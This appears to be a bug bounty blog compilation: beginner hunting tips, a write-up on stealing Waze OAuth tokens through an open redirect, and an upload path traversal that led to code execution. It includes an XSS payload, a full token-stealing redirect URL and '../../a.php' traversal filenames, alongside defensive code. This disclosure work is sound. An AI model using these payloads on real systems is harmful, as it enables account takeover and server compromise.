Getting started with Bug Bounty.

Hey, guys! This post is dedicated to all those who want to do bug bounty. Although I am not a *top* ranker like my friends Sandeep, Osama, Parth, Arbaz, etc., I learned many things along the way in bug bounty and I want to share them in this post 🙂

What should you know before getting into bug bounty? 

  • First of all, you should know the basics of web apps (of course, bug bounties are not limited to them): what is HTTP? What is HTML? What are HTML forms? What is JavaScript, and what does JS do? What is the structure of a web app (nowadays most web apps use MVC)? IMO these things matter. A book like Web Hacking 101 will help a lot.
  • Keep learning new things. How? HackerOne’s Hacktivity (Web Hacking 101 also covers this), other hunters’ blogs, and just dig in whenever you see a weird term or thing; maybe you end up learning something good.
  • Play with Burp, explore it 😉

Approaching a target

  • If you’re new, don’t just focus on reward-only sites; go for points too. This way you will learn by hunting and gain some reputation points as well.
  • Don’t change your target frequently. Give it at least 2-3 days; if you’re new to hunting it won’t be easy to find your first bug in minutes or hours.
  • Before hunting for bugs, explore the web app: see what type of app it is and get an idea of its basics. I always check out the API docs, which give me a quick overview of the web app.
  • If you think that a part of the site should have something, or that something can be bypassed, dig into it and don’t give up. Just a few days back Osama and I were hunting an endpoint and he ended up bypassing a fix; I gave up but he didn’t ;).
  • Try to bypass their filters and WAF; most of the time there will be a bypass for them. A quick example:

Recently I came across a target with a sitewide WAF which prevented any user input containing a JS event handler such as onmouseover, onload, etc. I tried on%0Bload but it was reflected as %0B itself. So I tested their API for creating a post, but I was doing it through the API console, which sat behind the WAF, so I manually made a request to api.target.com with my payload as the post content and boom, it executed 🙂 This way I managed to get more XSS in it 😀

  • Don’t be lazy. In the above example the manual request bypassed the WAF but the API console did not, because the API console was hosted at target.com/api/console, which had the WAF.
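To make that lesson concrete, here is an added example of my own (not the target’s code) simulating a blocklist WAF that covers only the console path while the same create-post handler is reachable on another path; the prefix, blocked fragments and payload are constructed. The takeaway for defenders is that output encoding belongs in the application, not only at one ingress.

```python
import html

# Constructed simulation of the setup in the story above (not the target's
# code): a blocklist WAF that fronts only the API console path, while the
# same create-post handler is also reachable directly on the API host.
BLOCKED_FRAGMENTS = ("onload", "onmouseover", "onerror", "<script")
WAF_COVERED_PREFIX = "/api/console"   # assumed; mirrors target.com/api/console

POSTS = []


def path_scoped_waf(path, body):
    """Return True if the edge filter blocks the request. It only inspects
    requests under the console prefix, so the bare API path is never seen."""
    if not path.startswith(WAF_COVERED_PREFIX):
        return False
    lowered = body.lower()
    return any(frag in lowered for frag in BLOCKED_FRAGMENTS)


def create_post(path, body):
    """Handler that trusts the edge filter and stores content unmodified."""
    if path_scoped_waf(path, body):
        return "blocked"
    POSTS.append(body)
    return "stored"


def render_post_unsafe(body):
    # Reflects stored content verbatim: whatever skipped the WAF reaches the
    # browser as live markup.
    return '<div class="post">' + body + "</div>"


def render_post_safe(body):
    # Output encoding in the application itself, so protection does not
    # depend on which ingress the request used.
    return '<div class="post">' + html.escape(body, quote=True) + "</div>"


if __name__ == "__main__":
    payload = "<img src=x onload=alert(1)>"  # constructed sample input
    print(create_post("/api/console/posts", payload))  # blocked
    print(create_post("/v1/posts", payload))           # stored
    print(render_post_unsafe(POSTS[-1]))
    print(render_post_safe(POSTS[-1]))
```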

That’s all for now, but there will be a second part of this post in which I will share some more fun things.

If you liked it do share 🙂

Thanks for reading.
Harsh from Bugdiscloseguys!

Google VRP : oAuth token stealing.

Original Blog Date is : 

Hey guys! Hope you are all doing well :). In June/July I decided to hunt on Google products. As Google has almost everything in scope, I went through the list of Google products/fully integrated acquisitions ( https://www.google.com/intl/en/about/products/ ). Waze is one of Google’s fully integrated acquisitions (there’s a difference between integrated and non-integrated), so I decided to give it a try 🙂

I was looking at the Waze iOS app and there was an option to log in with Twitter, so I started capturing requests. The URL was like this:

http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxxxx

(not exactly this, feeling lazy to check it out again :P)

The flow works in the same manner as the `Authorization Code flow`, as Twitter doesn’t have an `Implicit flow` (as far as I know).

1 – GET Request to http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxx

2 – 302 Response to https://api.twitter.com/oauth/authorize?oauth_token=xxxxx&redirect_uri=http://www.waze.com/SocialMediaServer/redirect?redirect=http://somdomain.waze.com%3Fsession_cookies=xxxx&server=this&publish=false&on_close=false&community=twitter&lang=&deviceid=0&is_group=false

3 – After authorizing, redirect to http://www.waze.com/SocialMediaServer/redirect?redirect=http%3A%2F%2Fsomdomain.waze.com%2Ftwitter%3Fsession_cookies=xxxx%26oauth_token%3D=xxx%26oauth_verifier=xxxxx

4 – And then finally redirect to http://somdomain.waze.com/twitter?session_cookies=xxxx&oauth_token==xxx&oauth_verifier=xxxxx

So everyone knows what is suspicious here: http://www.waze.com/SocialMediaServer/redirect?redirect=http%3A%2F%2Fsomdomain.waze.com%2Ftwitter%3Fsession_cookies=xxxx%26oauth_token%3D=xxx%26oauth_verifier=xxxxx

Luckily, yes, it was vulnerable to open redirect, so we had already won the battle 😀 But wait, we’re working with Twitter’s `oauth_verifier`, which is not very usable from an attacker’s perspective. Also Twitter requires us to authorize the app every time :/

Looking at ‘id’ in http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxx, it seemed some more social connects were possible, so I checked out the Android app as well and found Facebook and LinkedIn are also there. I started testing on Android; the flow for Facebook was completely different here. I started fuzzing around the old URL and tried replacing Twitter with Facebook.

GET Request – http://www.waze.com/SocialMediaServer/social/connect?id=facebook&session_cookies=xxx

Response – 500 Error 🙁

But wait, I have seen many apps working in the pattern /social/*connection_name*/connect, so let’s give it a try.

GET – http://www.waze.com/SocialMediaServer/social/facebook/connect?id=twitter&session_cookies=xxx

Response -302 :DDDDD,

Changed ?redirect=http://harshjaiswal.com  and response_type=token,signed_request

Final PoC :

https://m.facebook.com/v2.8/dialog/oauth?auth_type=rerequest&client_id=343050668156&default_audience=friends&redirect_uri=https://waze.com/SocialMediaServer/redirect?redirect=http://harshjaiswal.com&response_type=token,signed_request&return_scopes=true&scope=email,user_friends,user_events

Response –

http://harshjaiswal.com/?redirect=http://harshjaiswal.com#granted_scopes=user_events%2Cuser_friends%2Cemail%2Cpublish_actions%2Cpublic_profile&denied_scopes=&signed_request=XXXXXXX&access_token=EAAAATXXXXX&expires_in=688
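As an added example (mine, not Waze’s code), here is how the `redirect` parameter on an endpoint like /SocialMediaServer/redirect can be validated against an exact scheme-plus-host allowlist, so that an OAuth token carried in the query or fragment can only ever land on a registered host. The allowlist contents are an assumption; the host names come from the flow above.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed example of validating the `redirect` parameter of a redirect
# endpoint such as /SocialMediaServer/redirect (not Waze's code). The
# allowlist is an assumption for illustration; tighten to https only where
# the application supports it.
ALLOWED_REDIRECT_HOSTS = {"somdomain.waze.com"}
ALLOWED_SCHEMES = {"http", "https"}


def is_safe_redirect(url):
    """Exact scheme+host allowlist on the *parsed* URL.

    Substring checks such as `"waze.com" in url` pass attacker-controlled
    hosts; parsing first and comparing the hostname exactly also defeats
    userinfo tricks (https://somdomain.waze.com@other-host/), lookalike
    domains and scheme-relative URLs.
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    if parts.username is not None or parts.password is not None:
        return False
    host = (parts.hostname or "").lower()
    return host in ALLOWED_REDIRECT_HOSTS


def redirect_handler(query_string):
    """Return the Location value to send, or None to refuse the redirect.

    Refusing outright (rather than silently falling back) is what keeps the
    oauth_token / access_token in the query or fragment from reaching an
    unlisted host.
    """
    params = parse_qs(query_string, keep_blank_values=True)
    target = params.get("redirect", [""])[0]
    return target if is_safe_redirect(target) else None
```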

Although this was a fully integrated acquisition, I got a lower bounty 😛 as they still consider it an acquisition FOR bounty purposes 🙁

But it’s okay! At least I learned one thing: if they don’t give you the endpoint, try to guess it 3:)

I hope you like it. 🙂

Uploading file directory traversal RCE.

Hello guys! These days I’m not very active because of college life 🙁 but this weekend I got enough time to write about one of my findings on a private site 🙂 from which I was able to get Remote Code Execution on the server 🙂

Site : B*******.com
Description : Bitcoin sell and buy site 
Bug : Remote Code Execution

Ok, let’s start! First of all, the site’s login system was quite different: they send you an “Access Code” (a 7-digit code) to the registered email whenever you want to log in, and the site was behind Cloudflare.

Playing around with the uploader :

After login there was a page to upload documents, including ID proof, which had unrestricted file upload, but whenever I uploaded PHP and opened it, it was downloaded instead of executed. Then I started messing around with the uploader, and giving it some unsuitable characters produced a server error which leaked the server’s full path, the upload script path, and the server type (nginx).

Let’s read some files :

The thing I noticed was that anyfile.js was a script, and node_modules and the like were there (zero knowledge of Node.js on my part), so two things were confirmed: nginx and Node.js. But why wasn’t PHP executing? HTML was executed, which meant stored XSS, but I was looking for RCE. One thing I was missing is that nginx sometimes has problems with uploaders, so I used ../../a.php as the filename, which uploaded a.php into the root directory of the site, but it still wasn’t executing :/ meaning PHP wasn’t configured on the Node.js server. As I said, anyfile.js and its path were in the debug message, so I opened it and was fully shocked :O It was a Node.js file with the MySQL login (root user 😀 ), the SMTP mail login (Gmail, the same email which sends the “Access code”, which means account takeover was possible from here), and it was publicly accessible 😉

Let’s shell :

Doing some more work I was able to read many files, which meant I had arbitrary source code read. Now, as I said, Cloudflare was in front, so the real IP wasn’t available to me. I started looking for its IP, which led me to email headers that leaked the server IP. OK, but the MySQL port 3306 was closed (maybe it’s only up on 127.0.0.1, not on 0.0.0.0) (the same port was configured in anyfile.js), so I started looking for other ports on the same IP, which gave me two: ip:7788 and ip:8899. ip:8899 was a clone of the site, while ip:7788 had API documentation. By doing some work on ip:7788 I got its full path, which was /home/*user*/php/application/file.php 😀 Damn, PHP was configured here. Now I went back to port 8899, which was the clone of the site, used ../../../user/php/a.php, checked it at ip:7788/a.php and boom, PHP executed 😀

./My reaction : Let’s get into it xD but as a whitehat I can’t, it would violate the program’s policy



./Root cause : 
The uploader was misconfigured in 2 ways -> it allowed PHP and directory change (most probably because of nginx) — — — Eq. 1
Leak of the full path of a server which had PHP installed. — — — Eq. 2

By combining Eq. 1 and Eq. 2 ; Eq. 1 + Eq. 2 = RCE
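As an added example (mine, not the site’s code), here is an upload path handler that closes both halves of Eq. 1 independently: an extension allowlist that refuses PHP, and a filename rule plus containment check on the resolved path that refuses ../ traversal. The upload directory and allowed extensions are assumptions.

```python
import os
import re
from pathlib import Path

# Constructed example of a hardened destination-path check for an ID-proof
# uploader like the one above (not the site's code). UPLOAD_ROOT and the
# extension allowlist are assumptions for illustration.
UPLOAD_ROOT = Path("/srv/uploads")
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".pdf"}
# Must start with an alphanumeric (so "..", ".htaccess" are out) and may not
# contain "/" or "\" at all, so no path components can be smuggled in.
_SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,99}")


def safe_upload_path(user_supplied_name, upload_root=UPLOAD_ROOT):
    """Return the resolved destination Path, or None if the name is rejected.

    Two independent controls map to the two halves of Eq. 1 above:
    the extension allowlist blocks PHP (and other executable types), and
    the name rule + containment check block traversal out of the tree.
    """
    if not _SAFE_NAME.fullmatch(user_supplied_name):
        return None
    ext = os.path.splitext(user_supplied_name)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return None
    root = upload_root.resolve()
    dest = (root / user_supplied_name).resolve()
    # Defence in depth: even after symlink resolution the file must sit
    # directly under the upload root.
    if dest.parent != root:
        return None
    return dest


if __name__ == "__main__":
    # Constructed sample names; the traversal ones mirror the write-up.
    for name in ("id-proof.PNG", "../../a.php", "../../../user/php/a.php",
                 "a.php", ".htaccess"):
        print(name, "->", safe_upload_path(name))
```

Serving the stored files from a location the web server never executes (and with a download disposition) is the matching control for Eq. 2, since a leaked path then yields nothing executable.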

./Game Over
./Bounty awarded